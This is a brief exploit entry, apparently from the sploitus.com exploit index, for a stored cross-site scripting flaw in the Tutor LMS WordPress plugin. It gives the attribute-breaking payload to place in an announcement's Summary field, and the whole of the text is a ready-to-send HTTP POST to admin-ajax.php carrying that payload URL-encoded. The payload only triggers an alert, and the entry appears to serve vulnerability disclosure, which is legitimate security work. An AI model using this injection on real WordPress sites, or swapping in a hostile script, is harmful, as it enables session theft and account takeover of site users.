Share
## https://sploitus.com/exploit?id=WPEX-ID:9EF14CF1-1E04-4125-A296-9AA5388612F9
As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: " style="animation-name:rotation" onanimationstart="alert(/XSS/)//

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 341
Connection: close
Cookie: [Tutor Instructor+]

_tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create